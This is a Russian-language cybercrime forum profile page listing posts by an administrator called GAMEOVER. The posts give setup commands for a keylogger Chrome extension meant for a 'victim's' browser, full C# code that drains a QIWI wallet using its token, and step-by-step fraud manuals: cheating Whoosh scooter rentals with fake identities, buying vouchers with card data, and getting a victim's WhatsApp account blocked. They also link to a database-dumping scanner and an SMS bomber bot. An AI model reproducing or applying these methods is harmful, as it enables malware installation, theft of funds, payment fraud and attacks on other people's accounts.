Перейти к публикации

GAMEOVER

Administrator
  • Публикации

    556
  • Зарегистрирован

  • Посещение

  • Дней в лидерах

    117

Последний раз GAMEOVER выиграл 14 апреля

Публикации GAMEOVER были самыми популярными!

Репутация

320 Excellent

О GAMEOVER

2 728 просмотров профиля
  1. Создаем вредоносный плагин-кейлоггер для Google Chrome Hera – это утилита, позволяющая создать кейлогер, работающий как расширение в браузере Google Chrome. Установка на Linux $ git clone https://github.com/UndeadSec/HeraKeylogger $ cd HeraKeylogger $ sudo apt-get install python3-pip -y $ sudo pip3 install -r requirements.txt Запуск $ python3 hera.py Расширение будет создано и сохранено в папке «MaliciousExtension». Оно должно быть установлено вручную в браузере «жертвы». После установки, все нажатия клавиш и посещенные веб-сайты будут храниться в вашем файле log.txt.
  2. Суть 1. Переходим на сайт sbercloud.ru. Далее переходим по этой ссылке http://console.sbercloud.ru. Отправляемся в раздел "Услуги" и кликаем "Перейти в консоль". 2. Кликаем по "Elastic Cloud". 3. Нажимаем на "Create ECS". 4. Далее мы проходим всю настройку машины. Выбираем, все что угодно, это бесплатно. Выбираем нужное количество GB на диске и жмете "Next: Configure Network" Вводим наш пароль и жмем на зеленую кнопочку. Пароль рекомендую записать. Выбираем "default" и ждем далее. Поздравляю, у нас появился бесплатный дедик!
  3. И так, сразу к делу. Отступление Я предоставил весь код и комментарии к нему внутри, на случай если какая-то часть будет непонятна. Код можно улучшать и "прокачивать". Все в ваших руках 🙂 А да, язык на котором мы все пишем - C# Приступаем 1. Создадим новый проект. Тип проекта будет консольное приложение на .NET Core. 2. Зайдём в меню управление пакетами nuGet и подключим библиотеку RestSharp и Newtonsoft.Json 3. Создадим новый класс, который назовём Transaction. 4. В только что созданный класс вставим данный код. /// <summary> /// Токен киви кошелька /// </summary> private string Token { get; set; } /// <summary> /// Конструктор /// </summary> /// <param name="token">Токен</param> public Transaction(string token) { Token = token; } /// <summary> /// Получение номера киви кошелька /// </summary> /// <returns>Номер кошелька</returns> private string GetQiwiNumber() { var client = new RestClient("https://edge.qiwi.com/person-profile/v1/profile/current"); var request = new RestRequest(Method.GET); request.AddHeader("Content-Type", "application/json"); request.AddHeader("Accept", "application/json"); request.AddHeader("Authorization", $"Bearer {Token}"); request.AddParameter("application/json", ParameterType.RequestBody); IRestResponse response = client.Execute(request); JObject jobject = JObject.Parse(response.Content); JToken qiwiNumber = jobject.SelectToken("$.authInfo.personId"); if (qiwiNumber != null) { return (string)qiwiNumber; } else { return "Error"; } } /// <summary> /// Получение баланса /// </summary> /// <returns></returns> private double GetBalance() { string personId = GetQiwiNumber(); var client = new RestClient($"https://edge.qiwi.com//funding-sources/v2/persons/{personId}/accounts"); var request = new RestRequest(Method.GET); request.AddHeader("Content-Type", "application/json"); request.AddHeader("Accept", "application/json"); request.AddHeader("Authorization", $"Bearer {Token}"); request.AddParameter("application/json", ParameterType.RequestBody); IRestResponse response = client.Execute(request); JObject jobject = JObject.Parse(response.Content); JToken balance = jobject.SelectToken("$.accounts[0].balance.amount"); if (balance != null) { return double.Parse((string)balance); } else { return -1; } } /// <summary> /// Проверка ограничий /// </summary> /// <returns></returns> private string CheckLimitations() { string personId = GetQiwiNumber(); var client = new RestClient($"https://edge.qiwi.com//person-profile/v1/persons/{personId}/status/restrictions"); var request = new RestRequest(Method.GET); request.AddHeader("Content-Type", "application/json"); request.AddHeader("Accept", "application/json"); request.AddHeader("Authorization", $"Bearer {Token}"); request.AddParameter("application/json", ParameterType.RequestBody); IRestResponse response = client.Execute(request); JArray jsonArray = JArray.Parse(response.Content); JToken limition = jsonArray.SelectToken("$.[0].restrictionDescription"); if (limition != null) { return (string)limition; } else { return "Нет"; } } /// <summary> /// Метод служащий для вывода средств на ваш киви кошелёк /// </summary> /// <param name="number">Ваш номер киви кошелька</param> /// <param name="sum">Сумма для вывода средств</param> /// <returns>Булево значение</returns> public bool OutputTransaction(long number, int sum) { try { var client = new RestClient("https://edge.qiwi.com/sinap/api/v2/terms/99/payments"); var request = new RestRequest(Method.POST); request.AddHeader("Content-Type", "application/json"); request.AddHeader("Accept", "application/json"); request.AddHeader("Authorization", $"Bearer {Token}"); DateTime date = DateTime.Now; uint unixTime = (uint)(date.ToUniversalTime() - new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalSeconds; request.AddParameter("application/json", $"{{ \n \"id\":\"{unixTime * 1000}\", \n \"sum\": {{ \n \"amount\":{sum}, \n \"currency\":\"643\" \n }}, \n \"paymentMethod\": {{ \n \"type\":\"Account\", \n \"accountId\":\"643\" \n }},\n \"comment\":\"Перевод осуществлён {DateTime.Now:dd.MMM.yyyy}\", \n \"fields\": {{ \n \"account\":\"{number}\" \n }} \n }}", ParameterType.RequestBody); IRestResponse response = client.Execute(request); dynamic jobject = JObject.Parse(response.Content); if (jobject.transaction.state.code.ToString() != "Accepted") { return false; } else { return true; } } catch { return false; } } public string WalletInformation() { return $"Номер кошелька: {GetQiwiNumber()}\nБаланс кошелька: {GetBalance()}\nОграничения: {CheckLimitations()}"; } 5. Перейдём в класс Program и в метод Main пропишем ниже указанный код. while (true) { try { Console.WriteLine("Введите токен киви кошелька"); string token = Console.ReadLine(); Transaction transaction = new Transaction(token); Console.WriteLine(transaction.WalletInformation()); Console.WriteLine("\nВведите номер кошелька киви на который будет осуществлён вывод средств"); long number = long.Parse(Console.ReadLine()); Console.WriteLine("\nВведите сумму"); int sum = int.Parse(Console.ReadLine()); if (transaction.OutputTransaction(number, sum)) { Console.WriteLine($"Ваш Qiwi кошелёк был пополнен"); } else { Console.WriteLine($"Не удалось вывести средства"); } Console.ReadKey(); } catch (Exception ex) { Console.WriteLine(ex.Message); } } Буквально за 5 минут мы получаем простенький скрипт который: 1. Проверяет ограничения на кошельке. 2. Проверяет баланс кошелька 3. Получает номер кошелька 4. Выводит средства с кошелька. Всем профитов, друзья!
  4. Речь пойдет о довольно клевой программе с помощью которой можно просканировать на уязвимости сайт,а в дальнейшем выкачать его базу данных и не только! WebCruiser - И с чем его едят: https://disk.yandex.ru/d/dLyrDu5nIp2HOA
  5. Нашел для Вас тему, которая позволит кататься на самокатах Whoosh практически даром. Необходимости Виртуальная карта (подойдет любая, но я рекомендую выпускать MasterCard в Юмани/Tinkoff); Суть 1. Пополняем виртуальную карту на 501 рубль; 2. Регистрируем аккаунт whoosh. Для этого используем левую сим или сервисы приема смс (http://t.me/HELPER_SMS_BOT). После этого вписываем в аккаунт левые данные; 3. Добавляем в "способы оплаты" нашу карту, на которой уже есть 501 рубль; 4. Идем к самокату и арендуем его; 5. После того, как у нас спишут 500 рублей с карты, мы должны будем ее заблокировать. Не переживайте, на заблокированную карту деньги спокойно поступают; 6. Накатываем на любую сумму. Самое главное, что бы сумма не превышала 480-490 рублей; 7. Паркуем самокат. После этого нам возвращают 500 рублей обратно, а списать их уже не могут! Разблокируем карту и переводим с неё деньги. Карту можем удалить; 8. PROFIT! Иногда бывает, что 500 рублей не сразу приходят на карту, это баг. Максимум приходилось ждать поступления денег 2 дня. Практика показала, что быстрее всего средства приходят на MasterCard. Всем бесплатных покатушек ✌️
  6. GAMEOVER

    Дарк арбитраж, Фулки.

    Жду на проверку в лс!
  7. В этом мануле речь пойдет про метод вбива ваучеров, которые можно использовать во многих сервисах. Суть 1. Заходим на GameCardsDirect -> Gift Card -> Pre-paid Credits -> NeoSurf Card; 2. Теперь выбираем любой номинал(я выбрал 5$); 3. Жмем Add to Cart -> Pay и заполняем данные(указываем почту куда придет ваучер), выбираем show more и выбираем Visa/MasterCard; 4. Вводим данные карты и ждем; 5. Если видим payment succeeded, то значит все прошло, если нет, то меняем почту; 6. Получаем ваучер на указанную почту и идем депать его. Депнуть можно в БК, к примеру Franksno, либо в любую площадку из списка
  8. Неприятный сюрприз для 2 миллиардов пользователей WhatsApp. В сети появилась инструкция, которая позволит заблокировать любой аккаунт WhatsApp используя только номер телефона. Даже двухфакторная аутентификация не остановит этого. 1. Скачиваем WhatsApp на смартфон или эмулятор (PlayMarket / AppStore ); 2. Вводим номер телефона жертвы в логин (жертва получит sms с кодом подтверждения); 3. Вводим случайные цифры вместо кода; 4. Продолжаем отправлять sms и вводить случайные цифры до тех пор, пока WhatsApp не остановит отправку секретных комбинаций на 12 часов; 5. Регистрируем левый адрес электронной почты и с него отсылаем письмо в службу поддержки WhatsApp с просьбой деактивировать аккаунт, поскольку доступ к нему был утерян, и указываем номер жертвы. После этого поддержка без дополнительных вопросов блокирует учетную запись. Владелец аккаунта увидит в приложении WhatsApp сообщение о том, что номер телефона больше не работает на данном устройстве - даже в том случае, если у него была включена двухфакторная авторизация; 6. PROFIT! Отличный повод испортить жизнь вашим конкурентам ✌️
  9. Что нового: — Можно изменять cooldown сообщений в самом телеграме , командой /time [значение] ⏳ — Добавлен мануал + способы где найти чаты с раздачами 📕 — Добавлена команда /stats которая показывает статистику словленных чеков 📊 — Исправлены некоторые баги 🔧 https://disk.yandex.ru/d/oUZZEWRjTi45Ew
  10. Проверка успешно пройдена, к работе допускаю. @cryptocoach успешно обучил одного моего товарища, в качестве проверки. Обучение хорошее и стоит своих денег.
  11. Скрипт инвестиционного бота на Javascript https://disk.yandex.ru/d/BN4Q0XhVRxZSHg
  12. Скрипт бота New Bomber Простейший скрипт для поднятия собственного telegram-бота с последующей монетизацией. https://disk.yandex.ru/d/mxI13JprtpMi5A
  13. В базе поставщиков товаров присутствуют только российские дропшипперы, которые могут отправить товар в любую точку нашей страны. Вам останется только связаться с интересующим вас поставщиком товара из базы и обсудить с ним условия доставки и оплаты, уточнить ассортимент и ваш доход. Страна: Россия База в формате: xls, xlsx https://disk.yandex.ru/d/a4hE5qZ1tMW27g
×
×
  • Создать...